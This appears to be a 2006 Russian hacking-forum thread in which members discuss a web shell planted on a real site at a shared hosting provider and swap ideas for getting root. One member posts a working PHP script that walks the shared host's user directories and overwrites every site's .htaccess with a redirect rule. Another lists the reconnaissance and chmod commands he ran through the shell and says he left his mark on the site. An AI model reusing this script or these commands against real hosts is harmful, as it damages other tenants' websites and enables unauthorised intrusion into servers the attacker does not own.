Есть чё интересного?

Discussion in 'Безопасность и Анонимность' started by GoodGod, 21 Dec 2006.

Thread Status:
Not open for further replies.
  1. GoodGod

    GoodGod Elder - Старейшина

    Joined:
    20 Dec 2006
    Messages:
    216
    Likes Received:
    262
    Reputations:
    50
    Давайте посмотрим, есть ли там чё интересного?

    Вот закинул
    http://master-site.ru/docs/portfolio/index55.php?c=l&d=%2F
    А дальше у меня еще опыта нету. Увы=(

    Какие мысли, че с этим делать?

    Юзать сплоит, пока еще не научился.
    Может, кто-нибудь там сделает рут или может еще что и на примере покажет как все он это делал.

    Интересно же)
     
    #1 GoodGod, 21 Dec 2006
    Last edited: 21 Dec 2006
  2. GoodGod

    GoodGod Elder - Старейшина

    Joined:
    20 Dec 2006
    Messages:
    216
    Likes Received:
    262
    Reputations:
    50
    там кст хост агава.

    Обычно делаю только вот такие вот вещи.
    Типо акцесс во всех папках меняю.

    <?php

    set_time_limit(0);
    $dir="/home/../../"; //измени!
    $htaccess="RewriteEngine on
    RewriteRule ^index.([^\/]*)(\/?)?$ / [R]
    ";
    $c=0; $k=0;
    $handle = opendir ($dir);
    while($dh = readdir($handle))
    { $dh=trim($dh);
    if( $dh!=".." && $dh!="" ){
    $file[$c]=$dh;
    $c++;}
    }

    closedir($handle);

    for($c=0;$c<sizeof($file);$c++)
    {
    if(is_dir($dir.$file[$c]))
    {
    $path_to_htaccess[$k]=$dir . "/" . $file[$c] . "/" . "public_html" . "/" .
    ".htaccess";
    $k++;
    }
    }

    for($c=0;$c<sizeof($path_to_htaccess);$c++)
    {
    //unlink($path_to_htaccess[$c]);
    $handle=fopen($path_to_htaccess[$c],"w"); //или лучше "a+"?
    fwrite($handle,$htaccess);
    fclose($handle);
    }
    ?>
     
  3. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    Типа кто первый порутаеетттт
     
  4. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    437
    Reputations:
    90
    cd ../..;cat !index.html гг
    а что тут всё просто))), а рута.... эххх фрях же... работает чмод:
    PHP:
    cd ../..;pwd;id;uname -a;ls -la;chmod +r guest.php
    видим на примере гуеста:
    -rwxrwxr-x 1 ulhotel3 virthost 10927 Dec 21 20:58 guest.php
     
  5. GoodGod

    GoodGod Elder - Старейшина

    Joined:
    20 Dec 2006
    Messages:
    216
    Likes Received:
    262
    Reputations:
    50
    Ну от того что он там работает, мне вот что-то от части не легче.

    А вот как бы получить доступ к другим сайтам, только имея рут?
    Как например узнать адреса сайтов всех, какие там есть?
     
  6. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    437
    Reputations:
    90
    узнать?? гг да оч просто к примеру zvezda3 - zvezda.ru ))) а войти в другие папки, тока root права... хотя бы на чтение).. там же FreeBSD, так что... забудь, к тому же сайт заблокирован
     
  7. GoodGod

    GoodGod Elder - Старейшина

    Joined:
    20 Dec 2006
    Messages:
    216
    Likes Received:
    262
    Reputations:
    50
    Ну уже да=)
    а так хотелось бы..))))
     
  8. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    437
    Reputations:
    90
    жди пока появиться сплоет под двигу, кста шеллу давно снесли... а я где-то смог поднять немножко прав путем чмода и оставил свою скромненькую надпись
     
  9. GoodGod

    GoodGod Elder - Старейшина

    Joined:
    20 Dec 2006
    Messages:
    216
    Likes Received:
    262
    Reputations:
    50
    Да я на этом сайте уже докуя раз оставлял свою подпись.
    Просто интересно была, что же все таки большего можно сделать.
    а шелл действительно кто-то снес. ((
     
  10. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    437
    Reputations:
    90
    Ну так снесла АГАВА, так как он уже и был заблокирован, ибо всем спасибо, спасибо за работу )))

    тему можно и клозе
     
Thread Status:
Not open for further replies.